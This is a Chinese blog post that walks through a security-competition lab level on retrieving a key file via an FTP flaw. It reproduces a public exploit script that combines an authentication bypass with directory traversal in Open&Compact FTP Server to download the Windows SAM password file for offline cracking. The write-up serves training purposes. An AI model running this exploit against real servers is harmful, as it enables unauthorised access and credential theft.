网络空间安全赛题解析-通过ftp漏洞获取网站权限

最新推荐文章于 2024-05-05 03:11:49 发布
最新推荐文章于 2024-05-05 03:11:49 发布
阅读量146 收藏
点赞数 1
分类专栏: 网络空间安全 攻防案例 文章标签: 安全 服务器 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_57099902/article/details/130802428
版权
文章详细描述了如何利用FTP服务软件Gabriel’sftpserver的一个版本漏洞,通过Python脚本来实现无认证访问并获取目标主机C盘下的key.txt文件内容,以此解决关卡挑战。过程中涉及了TCP连接、目录遍历攻击和授权绕过技术。
摘要由CSDN通过智能技术生成

目录

1:题目背景

2:题目描述

3:答案提交

4: 提交key

5: 关卡环境

6:参考步骤

环境启动方法

27401.py脚本

1:题目背景

文件传输协议使得主机间可以共享文件。 FTP 使用TCP 生成一个虚拟连接用于控制信息,然后再生成一个单独的 TCP 连接用于数据传输。控制连接使用类似TELNET协议在主机间交换命令和消息。文件传输协议是TCP/IP网络上两台计算机传送文件的协议,FTP是在TCP/IP网络和INTERNET上最早使用的协议之一,它属于网络协议组的应用层。FTP客户机可以给服务器发出命令来下载文件,上传文件,创建或改变服务器上的目录

2:题目描述

在这一关,你需要利用ftp获取位于目标主机(ip:192.168.102.62)c盘下的key.txt文件,提交里面的key来通过本关。

3:答案提交

1、提交得到的key。

2、请提交操作过程报告,报告中要包含操作的关键过程描述并附截图,以WORD方式提交。

4: 提交key

Key:ftp bypass

5: 关卡环境

VPC1(虚拟PC

工具场景:Windows XP操作系统/BT5

VPC2(虚拟PC

Window server 2003

软件描述

使用工具场景集成的工具软件,参赛者也可以上传工具软件软件到工具场景。

关卡环境描述

1、学生机与实验室网络直连

2、VPC与实验室网络直连

3、学生机与VPC物理链路连通

6:参考步骤

1.打开终端,输入ftp 192.168.102.62 连接ftp服务器,发现ftp服务软件为Gabriel’s ftp server。

 2.通过搜索引擎,查找版本找到资料:

http://www.exploit-db.com/exploits/27401/

3.下载攻击脚本27401.py放在桌面,修改为如下:

 4.打开新终端并切换到桌面,执行python 27401.py

 5.得到key:

 

环境启动方法

开启目标服务器(IP:192.168.102.62),使用administrator用户登录,密码123456;

从桌面的open-ftpd目录下打开ftpd.exe文件,启动服务。

 

27401.py脚本

#!/usr/bin/python
# Exploit Title: Open&Compact Ftp Server <= 1.2 Auth bypass & directory traversal sam retrieval
# Date: Aug 7, 2013
# By Wireghoul - http://www.justanotherhacker.com
# Based on Serge Gorbunov's auth bypass (http://www.exploit-db.com/exploits/13932/)
# Software Link: http://sourceforge.net/projects/open-ftpd/
# Version: <= 1.2
# Tested on: Windows 7, Windows XP SP3

# Abusing authentication bypass in combination with a directory traversal to grab
# the sam file for offline cracking

import ftplib
import os

# Connect to server

ftp = ftplib.FTP( "192.168.58.135" )
ftp.set_pasv( False )

# Note that we need no authentication at all!!

print ftp.sendcmd( 'CWD C:\\\\windows\\\\repair\\\\' )
print ftp.retrbinary('RETR sam', open('sam', 'wb').write )

ftp.quit()

你可知这世上再难遇我
关注
专栏目录
通过ftp 漏洞获取系统的权限
shatianyzg的博客
06-09 496
环境:攻击机kali ip:192.168.146.132 靶机: metasploitble2 1.通过扫描获取系统的ip 通过扫描知道靶机操作系统linux ,ip :192.168.146.133 这里通过输入whoami,知道拿到了系统最高权限root权限,但没有交互窗口输入python -c 'import pty; pty.spawn(“/bin/bash”)'出现交互窗口...
2022全国职业技能大赛-网络安全赛题解析总结①(超详细)
Aluxian_的博客
05-11 1万+
2022全国职业技能大赛-网络安全赛题解析总结(自己得思路)模块A 基础设施设置与安全加固(20分)模块B 网络安全事件响应、数字取证调查和应用安全(40分)模块C CTF夺旗-攻击(20分)模块D CTF夺旗-防御(20分) 模块A 基础设施设置与安全加固(20分) 一、项目和任务描述: 假定你是某企业的网络安全工程师,对于企业的服务器系统,根据任务要求确保各服务正常运行,并通过综合运用登录安全加固、数据库安全策略、流量完整性策略、事件监控策略、防火墙策略、IP协议安全配置等多种安全策略来提升服务器
网站ftp服务器漏洞利用,网站入侵渗透综合分析和FTP提权得系统权限
weixin_32175667的博客
08-04 1014
当我们想入侵检测一个网站拿后台/webshell后想进一步获得网站服务器管理权限。小残在这里为大家介绍下一下思路第一个思路:啊D+GOOGLE找注入点PS:可以通过直接在网站查看动态界面 类似于:asp?id=的动态界面进行手工查找如果没找到动态页面可以通过百度或者谷歌进行搜索网站的动态页面通过谷歌语法: 假如要查看的网站是www.*****.net 那么就可以这样搜索 site:www.***...
FTP服务器漏洞
qq_35266419的博客
10-10 2942
题目 目标系统通过Serv-U搭建了一个FTP服务。请尝试利用软件的漏洞获取目标服务器系统的FLAG.txt文件内的flag值并提交。 题目分析 1.FTP服务器 (1)定义:FTP服务器(File Transfer Protocol Server)是在互联网上提供文件存储和访问服务的计算机,它们依照FTP协议提供服务。 FTP是File Transfer Protocol(文件传输协议)。顾名思...
这是一道CTF网络空间安全比赛的密码题题目:再加密一次 题目内容:rejnvizjgfcriezxyk 再加密一次就会得到answer啦! 请给出解答并作出解释...
weixin_35756624的博客
02-11 163
这道题目的答案是将字符串"rejnvizjgfcriezxyk"进行一次Caesar Cipher移位加密。Caesar Cipher是一种简单的字母移位加密方法,即将每个字母向后移动一个固定的位数,并用移位后的字母替换原字母。 在这道题目中,我们可以将每个字母向后移动1位,最后得到的结果就是答案:"sfkowjakhgdjsfyzl"。 所以答案是 "sfkowjakhgdjsfyzl". ...
FTP-利用FTP后门漏洞
Myu_wzy的博客
09-24 877
一、实验原理 vsftpd手工触发漏洞: 当进行FTP认证时,如果用户名USER中包含" :) ",那么直接就触发监听6200端口的连接的shell 二、实验环境 目标主机:Metasploit2虚拟机 192.168.20.143 攻击主机: Kali2虚拟机 192.168.20.133 三、实验过程 先用nc连接靶机,并在进行FTP认证时,用户名包含" :) " 此时靶机的6200端口已经开启 由于nmap进行自动扫描时,默认不会扫描6200端口,所以需要我们手动扫描6.
2022年广东省中职组“网络空间安全赛题赛题解析(超详细)
热门推荐
Aluxian_的博客
10-10 3万+
3.检测服务器场景配置是否可以浏览系统目录,如果验证存在将此漏洞在Apache配置文件中进行加固,寻找系统根目录/var/www 的配置属性,对该属性的原内容进行权限删除的方式加固,并重启Apache服务,将此加固项删减字符串作为Flag提交;2.检测服务器场景中此版本apache是否存在显示banner信息漏洞,如果验证存在,修改配置文件将此漏洞进行加固,并重启Apache服务,将此加固项内容字符串(不包含状态)作为Flag提交;在服务器场景上查看apache版本,将查看到的服务版本字符串完整提交;
2021全国职业技能大赛-网络安全赛题解析总结①(超详细)
Aluxian_的博客
10-21 2万+
模块A 基础设施设置与安全加固 一、项目和任务描述: 假定你是某企业的网络安全工程师,对于企业的服务器系统,根据任务要求确保各服务正常运行,并通过综合运用登录和密码策略、数据库安全策略、流量完整性保护策略、事件监控策略、防火墙策略等多种安全策略来提升服务器系统的网络安全防御能力。 二、服务器环境说明: Windows 用户名:administrator,密码:123456 Linux 用户名:root,密码:123456 三、具体任务(每个任务得分以电子答题卡为准) A-1任务一 登录安全加固(Wi
2022全国职业技能大赛某市赛“网络空间安全赛项”赛题赛题解析(超详细)
Aluxian_的博客
06-12 3021
一、项目和任务描述: 假定你是某企业的网络安全工程师,对于企业的服务器系统,根据任务要求确保各服务正常运行,并通过综合运用登录和密码策略、流量完整性保护策略、事件监控策略、防火墙策略等多种安全策略来提升服务器系统的网络安全防御能力。 二、服务器环境说明: IDS:入侵检测系统服务器(Snort),操作系统为 Linux LOG:日志服务器(Splunk),操作系统为Linux Web:IIS 服务器,操作系统为 Windows Data:数据库服务器(Mysql),操作系统为 Linux..........
2024山东省职业院校技能大赛“网络空间安全赛题赛题解析(超详细)_2024年山东省职业院校技能大赛中职组网络安全赛项竞赛样题(2)
最新发布
2401_84252820的博客
05-05 927
在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。密码:root),进入mysql数据库,改变默认 mysql 管理员的名称,将系统的默认管理员root 改为 admin,防止被列举,将操作命令作为flag提交。密码:root),进入mysql数据库,查看所有用户及权限,找到可以从任意 IP 地址访问的用户,使用drop命令将该用户删除,将操作命令作为flag提交。
记一次FTP提权
weixin_34353714的博客
09-09 871
之前我已经得到一个SHELL不过没有多大的权限,如图1WScript.Shell 和Wscript.Network被干掉了没办法运行程序不过还好,FSO还是支持的,先逛逛看有什么好东西c:\没有权限打开,意料中的c:\winnt\没有此目录或没有权限打开再看看c:\windows打开了,看来是win2003的系统啊本来还打算数据库溢出返回一个CMD呢,虽然是GUEST权限的,...
Ftp服务器漏洞利用与修补
weixin_34007879的博客
07-25 563
       Serv_u是目前搭建ftp服务器最普遍的服务器之一,提升权限利用的漏洞原理主要有一下几点:       一、默认安装了系统服务,系统服务运行的是system权限,这个是可以创建系统账号的,可以通过相关命令创建       二、没有修改serv_u的默认密码,旧密码大家都知道,到网上搜一下就知道了          黑客可以通过入侵一个网站,得到一个webshell,通过w...
2022-渗透测试-信息收集-Metasploit(基于FTP协议)
保持微笑的博客
01-16 1904
目录 1.查看FTP服务的版本信息 2.通过FTP拿到root权限 3.ftp匿名登陆扫描 4.ftp暴力破解 1.查看FTP服务的版本信息 1.打开kali系统的Metasploit软件。 2.查找模块 search ftp_version 3.使用模块 4.查看需要配置的参数 show options 5.设置目标主机--靶机 set RHOSTS 192.168.0.112 6.run 如图,我们可以得知ftp的版本号是2.3.4 2.通过FTP...
第三方软件提权之FTP软件
qq_50854662的博客
02-15 824
第三方软件提权之FTP软件
渗透测试之Metasploit
11-20
本套教程,我们将为大家详细讲解Metasploit的使用方法。Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。
4.1、漏洞利用-FTP漏洞
c10udz的博客
09-04 2198
ftp协议:文件传输协议,使用客户/服务器(C/S)模式,用于Internet上的控制文件的双向传输(上传下载),属于网络传输协议的应用层,使用21号端口。nmap --script vuln -p 21 192.168.12.129 //漏洞探测。nmap -p 21 192.168.12.129 //扫描靶机21端口是否开启。攻击机:kali、IP=192.168.12.128。//使用nc登录靶机,密码可为空或任意,大小写皆可。FTP文件传输格式:(1)ASCII(2)二进制。
Serv-u Ftp Server 本地权限提升漏洞
weixin_34174422的博客
04-28 289
Serv-u Ftp server(以下简称Serv-u)是一个应用比较广泛的Ftp Server,功能强大,使用方便,Serv-u>3.x版本存在本地权限提升漏洞,使用guest权限结合Exp可以以system权限运行程序,通过Webshell结合Exp提升权限已经成了很常用提升方法。 漏洞简介: 漏洞是使用Serv-u本地默认管理端口,以默认管理员登陆...
FTP协议及相关漏洞
weixin_45253216的博客
03-09 4905
1.ftp简介 网络文件共享服务主流的主要有三种,分别是ftp,nfs,samba。 FTP是File Transfer Protocol(文件传输协议)的简称,用于internet上的控制文件的双向传输。 FTP也是一个应用程序,基于不同的操作系统有不同地FTP应用程序,而所有这些应用程序都遵守同一种协议以传输文件。在FTP的使用当中,我们经常会遇到两个概念:下载和上传。 下载(Downloa...
服务器2008系统提权工具,CVE-2019-12181 Serv-U FTP Server 本地提权漏洞(Metasploit)利用工具...
weixin_39905226的博客
08-05 560
CVE-2019-12181 Serv-U FTP Server 本地提权漏洞(Metasploit)利用工具源码###ThismodulerequiresMetasploit:https://metasploit.com/download#Currentsource:https://github.com/rapid7/metasploit-framework##classMet...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

你可知这世上再难遇我

君不见黄河之水天上来

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值